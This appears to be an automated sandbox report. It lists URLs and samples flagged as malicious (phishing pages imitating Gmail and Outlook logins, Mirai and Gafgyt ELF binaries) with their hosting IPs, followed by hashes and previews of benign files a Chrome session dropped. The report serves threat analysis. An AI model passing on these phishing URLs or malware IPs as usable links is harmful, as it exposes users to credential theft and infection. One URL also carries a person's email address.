                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://gmail.net-login.com/XcXRYNDdyQ3ZtSld4UE4wVUJrekFCdThLQ2ZDbXJubWlkcy85YXZZRFpSOGRHZ0lqc1lEVlJhUFJ4T1JpVkZYRHlPM2luOWZsUlg0akRFL0JzN3BQNEMzS2I3QUtSaG9zWXhKL1R0cG5TcEV6YUpSMkZRT1BkNGd1eVg1eHFjTW5CbVFQV0l5RXdmVG9qV2tod3dRS0ZpbkcvY3EwZk91cnM4R003RE1ESDZkNUoxOTZyTTZQcEExKy0tVmRVQklXeHltU1Jqc0VOaS0tMDhlR1IwQTdzanVybEhTdHNlbmhsZz09?cid=2354608568Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                    • 104.17.247.203
                                                                                                                                                                                                                                    https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.18.95.41
                                                                                                                                                                                                                                    FACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 108.162.193.94
                                                                                                                                                                                                                                    http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
                                                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                                                    https://www.facebook.com/nd/?groups%2F1890503424692037%2Frequests%2F&aref=1736211772582402&medium=email&mid=62b1fb1698c7dG5b016dc7de4cG62b134df5aa02G15&bcode=2.1736266217.AbwE-ZmXZYS4oNRxqqE&n_m=kbaker%40beachbody.com&n_sg=Q6bPBAFZX1Mx9VszlkbcFfVLHA3nPTNzix2i89aoCYRx0_63xA&rms=v2&irms=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                    https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.22.57.245
                                                                                                                                                                                                                                    Solara_v3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.20.4.235
                                                                                                                                                                                                                                    Solara_v3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.20.3.235
                                                                                                                                                                                                                                    https://publuu.com/flip-book/763064/1693399Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.16.124.96
                                                                                                                                                                                                                                    https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                    NEXINTO-DEm68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 212.229.142.163
                                                                                                                                                                                                                                    loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 212.228.15.172
                                                                                                                                                                                                                                    chernobyl.i586.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    chernobyl.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                    • 195.179.230.64
                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://gmail.net-login.com/XcXRYNDdyQ3ZtSld4UE4wVUJrekFCdThLQ2ZDbXJubWlkcy85YXZZRFpSOGRHZ0lqc1lEVlJhUFJ4T1JpVkZYRHlPM2luOWZsUlg0akRFL0JzN3BQNEMzS2I3QUtSaG9zWXhKL1R0cG5TcEV6YUpSMkZRT1BkNGd1eVg1eHFjTW5CbVFQV0l5RXdmVG9qV2tod3dRS0ZpbkcvY3EwZk91cnM4R003RE1ESDZkNUoxOTZyTTZQcEExKy0tVmRVQklXeHltU1Jqc0VOaS0tMDhlR1IwQTdzanVybEhTdHNlbmhsZz09?cid=2354608568Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                    • 104.17.247.203
                                                                                                                                                                                                                                    https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.18.95.41
                                                                                                                                                                                                                                    FACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 108.162.193.94
                                                                                                                                                                                                                                    http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
                                                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                                                    https://www.facebook.com/nd/?groups%2F1890503424692037%2Frequests%2F&aref=1736211772582402&medium=email&mid=62b1fb1698c7dG5b016dc7de4cG62b134df5aa02G15&bcode=2.1736266217.AbwE-ZmXZYS4oNRxqqE&n_m=kbaker%40beachbody.com&n_sg=Q6bPBAFZX1Mx9VszlkbcFfVLHA3nPTNzix2i89aoCYRx0_63xA&rms=v2&irms=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                    https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.22.57.245
                                                                                                                                                                                                                                    Solara_v3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.20.4.235
                                                                                                                                                                                                                                    Solara_v3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.20.3.235
                                                                                                                                                                                                                                    https://publuu.com/flip-book/763064/1693399Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 104.16.124.96
                                                                                                                                                                                                                                    https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:52:23 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2673
                                                                                                                                                                                                                                    Entropy (8bit):3.9892354444023335
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:8X1jdLTTLfsHeidAKZdA1FehwiZUklqehNy+3:8FZLJKy
                                                                                                                                                                                                                                    MD5:1FF16A00D39DFAAD19982EA73883DC9C
                                                                                                                                                                                                                                    SHA1:AED39A10F25304E1B4862DBE34FBE5A1B891B2A9
                                                                                                                                                                                                                                    SHA-256:E5A2A1216FD94D5B164459E3FCA47DF808596871D895269DC3B358D15F1FD35D
                                                                                                                                                                                                                                    SHA-512:666408B6BE9576EDCAAE349E805BD51DBAB1BA9575767E36D32F26C502A3C123C4DBA5CDA26C80F0C646741D9531C4F0AC8EDCEF26C5CD1B879C8931BD8A66A0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....?...,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:52:23 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2675
                                                                                                                                                                                                                                    Entropy (8bit):4.003994330339086
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:8yXjdLTTLfsHeidAKZdA1seh/iZUkAQkqeh6y+2:8OZL/9Q/y
                                                                                                                                                                                                                                    MD5:F2DE0959620B74F38AA46E072E0D8427
                                                                                                                                                                                                                                    SHA1:1210FC8D58351CCE07FD26AF9585520A76E1AD56
                                                                                                                                                                                                                                    SHA-256:B6CFB2721D4A83A2031B0373FEAB239EACA91CAF5D36C7A5721AE02F18013B96
                                                                                                                                                                                                                                    SHA-512:AB51B728F7A6CA5EC5AAD306EFDFD2A55C644F2A7CEDD705096FA1E97F3ECF545DFC88B793D5134CD89AE30BD9B11569CC9F948AAC88514473A3432830C2BC0C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....*...,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2689
                                                                                                                                                                                                                                    Entropy (8bit):4.015097439097981
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:8XdLTTLfAHeidAKZdA14meh7sFiZUkmgqeh7s8y+BX:8tL3n2y
                                                                                                                                                                                                                                    MD5:3D9F2F260C6067ABE26AEB8DE510B3BA
                                                                                                                                                                                                                                    SHA1:C771548CE2A1EF67C1675BD46244EE3DB54B66BC
                                                                                                                                                                                                                                    SHA-256:6BD87A919F85490A01A8EADBA43E49CB5BB91AE49E38BEAF19246960C7A743FD
                                                                                                                                                                                                                                    SHA-512:A9638476DF0683008E7A420D2CE9EADC153A6FF2DB9566F5F6D5E0CD2366221026F49163A7C9CA3D78DDA766A8FB61FBFA3323E66663E5191D43DE130269182C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:52:23 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                    Entropy (8bit):4.0051175043972265
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:8hjdLTTLfsHeidAKZdA1TehDiZUkwqehOy+R:8hZLM0y
                                                                                                                                                                                                                                    MD5:967601A2F4188F8AD3F8D6D2AC429988
                                                                                                                                                                                                                                    SHA1:EC13C20940FC63F804C79E0433857BC2576E88FC
                                                                                                                                                                                                                                    SHA-256:EB9E788E3BE613EE57F3A3098CC57C63CA2979D49749B59DC15EC53B171ED376
                                                                                                                                                                                                                                    SHA-512:E7EBC46B74C40CE142557A0DAE434F0D9A9A2D87285CA31163B74BDF11BA93D10ED451A4B0A3C05EA94F256D300E1199BB84120DDD875B134A7FA6DA24208072
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.......,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:52:23 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                    Entropy (8bit):3.992089885215726
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:86/jdLTTLfsHeidAKZdA1dehBiZUk1W1qehYy+C:8cZLc94y
                                                                                                                                                                                                                                    MD5:97A9B7E73A23688DCB4072B047ECC149
                                                                                                                                                                                                                                    SHA1:87FB21B729F543AD70A5069E96320ADC4CCD06D7
                                                                                                                                                                                                                                    SHA-256:04A39268CDF11F605B8298E9687F3C73CCF6221D983B27968A5B69DDADA1E983
                                                                                                                                                                                                                                    SHA-512:EF7B9DADB8568FD5842C349DF6676ACF12F929AA9F34BF4DF59378718CEE38969BD63FFA1AE562A8077F5F100602BE6C3F042C0612C5D5191E36050088A47FFC
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....I...,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 16:52:23 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                    Entropy (8bit):4.003395469503057
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:8DjdLTTLfsHeidAKZdA1duTeehOuTbbiZUk5OjqehOuTb2y+yT+:8DZLuTfTbxWOvTb2y7T
                                                                                                                                                                                                                                    MD5:522329D13D8844DF54DA3A6993093B0C
                                                                                                                                                                                                                                    SHA1:A9D6D436ACB9867DF102DC23FB175647B0F91FDB
                                                                                                                                                                                                                                    SHA-256:0E8E46136822558B6779E7579BEB9CDD869690246FD3FE3F6073346908FB41CB
                                                                                                                                                                                                                                    SHA-512:502D6AFE0A0C026DACB202DC45BAD37CD706E18F4BF11C2D14A73C30BD12F50CB660F1FAC79EDD9168BDFD1B84E242940AAC14B6947E87DA9BF880E17953BC9F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,........,a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............S7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4499)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22854
                                                                                                                                                                                                                                    Entropy (8bit):5.371142534045146
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:vnqx9BVqIPt6+3sdygsOarP1UFWq7yKiadWpu5gx3FF4z8nzZf/y9eqNUb:vqx9BoCnsAgDaRUgq7pdiu5glz4AnzZT
                                                                                                                                                                                                                                    MD5:C325B04E1759A82399F0FA06446ECB62
                                                                                                                                                                                                                                    SHA1:C0D74B9FE4B71A9B672F735FA1D3CF09112D81A5
                                                                                                                                                                                                                                    SHA-256:AE5CDE57FC38F15D6B68C6121D0B56455C6D62E9FB78B131FF10249127286EB1
                                                                                                                                                                                                                                    SHA-512:D6BB35A0485FA76AE835AE84732AAECC681008CAB2150302B018BE92C475AB254FBC37EA12AC725DAEA7CA74ED20419E37A7CA73DAC0D1E0F14381990F588319
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["ext.gadget.ReferenceTooltips@1fceb",function($,jQuery,require,module){(function(){var REF_LINK_SELECTOR=window.rt_REF_LINK_SELECTOR||'.reference, a[href^="#CITEREF"]',COMMENTED_TEXT_CLASS=window.rt_COMMENTED_TEXT_CLASS||'rt-commentedText',COMMENTED_TEXT_SELECTOR=(window.rt_COMMENTED_TEXT_SELECTOR||(COMMENTED_TEXT_CLASS?'.'+COMMENTED_TEXT_CLASS+', ':'')+'abbr[title]');if(mw.messages.get('rt-settings')===null){mw.messages.set({'rt-settings':'Reference Tooltips settings','rt-enable-footer':'Enable Reference Tooltips','rt-settings-title':'Reference Tooltips','rt-save':'Save','rt-enable':'Enable Reference Tooltips','rt-activationMethod':'Show a tooltip when I\'m','rt-hovering':'hovering a reference','rt-clicking':'clicking a reference','rt-delay':'Delay before the tooltip appears (in milliseconds)','rt-tooltipsForComments':'Show the tooltip over <span title="Tooltip example" class="'+(COMMENTED_TEXT_CLASS||'rt-commentedText')+.'" style="border-bottom: 1px d
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 135 x 155, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):7951
                                                                                                                                                                                                                                    Entropy (8bit):7.933776057154196
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:+98K0ssoez4u3fSWeN0vFAeJteKmcx+W00gWYVoB2mNgxZp:+dSohISWe6FbpV00gW0pxj
                                                                                                                                                                                                                                    MD5:814092D761989C74620EB311F2C71B9D
                                                                                                                                                                                                                                    SHA1:E6F58AAEC8F31EB222F9E10FA9E9F64B79AE888C
                                                                                                                                                                                                                                    SHA-256:4A702E2EDA9F4D04325A90088FBE04003D335B09A2F62AB52A05BD6B4441208E
                                                                                                                                                                                                                                    SHA-512:9E7869BC5C466D5EFBA51FB10B6C10443AA74D71EEEA671EDBBD1DB73E3D842B574A24AB48C267221D3BF20EAB77EF27CDDB0A4717AB5075942A7D02998AB138
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............-x.....PLTEGpL..............WWW......................SSS..........................<<?.......................................TRTXVW...............a`a.........................^^^.........oop......nnoxyz{{{.....TTTWWX.........rss...lll..........................................................................................................................................................................hgh...[Z[...................kkk.................._]^......3/1...=::..............................yxy.....||}...KII...ONO.....................EBC.................................nmn...ede845.........rqs.......................................................................................................................vuv......................|....tRNS.5..V....4G".......n........r..r\..i....F.............-_.....|....D....\.........6.>../f.n.a...N.........CV...[~s.w..*H$....{i.....u..r-...;IDATx^..N.@...Z+..)F......SX.q...~.$.w.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):704
                                                                                                                                                                                                                                    Entropy (8bit):4.690707101256654
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:TMHd6FdmeBevgqcB+CPbGZ9OPsClYzFoAmFJiFHjJvYADLcAXD4Kn:2d6FdmeGH0g9OUSdA6SvRDLNXD4Kn
                                                                                                                                                                                                                                    MD5:BC8FC77B826EC97DF462E51C63A003A9
                                                                                                                                                                                                                                    SHA1:D5574779AF087BEDD38D985E0C5FC9FC35EA49E8
                                                                                                                                                                                                                                    SHA-256:11FF898D3A99CE9B2FE1E0C746ABDB89B50F8DA5A5597023ABE54AC1278A428E
                                                                                                                                                                                                                                    SHA-512:5602B266BAD8E7AF502EDB2E4EBB5284AF0CD8355E46ECB1130F3FACF0C4528F1A1FBF227F47C05131D7C93A054BA2D8440C47FE888D07F492E76E28FA71EDB5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...language..</title><g fill="#36c"><path d="M20 18h-1.44a.6.6 0 0 1-.4-.12.8.8 0 0 1-.23-.31L17 15h-5l-1 2.54a.8.8 0 0 1-.22.3.6.6 0 0 1-.4.14H9l4.55-11.47h1.89zm-3.53-4.31L14.89 9.5a12 12 0 0 1-.39-1.24q-.09.37-.19.69l-.19.56-1.58 4.19zm-6.3-1.58a13.4 13.4 0 0 1-2.91-1.41 11.46 11.46 0 0 0 2.81-5.37H12V4H7.31a4 4 0 0 0-.2-.56C6.87 2.79 6.6 2 6.6 2l-1.47.5s.4.89.6 1.5H0v1.33h2.15A11.23 11.23 0 0 0 5 10.7a17.2 17.2 0 0 1-5 2.1q.56.82.87 1.38a23.3 23.3 0 0 0 5.22-2.51 15.6 15.6 0 0 0 3.56 1.77zM3.63 5.33h4.91a8.1 8.1 0 0 1-2.45 4.45 9.1 9.1 0 0 1-2.46-4.45"/></g></svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):298
                                                                                                                                                                                                                                    Entropy (8bit):5.1399561245747964
                                                                                                                                                                                                                                    Encrypted:false
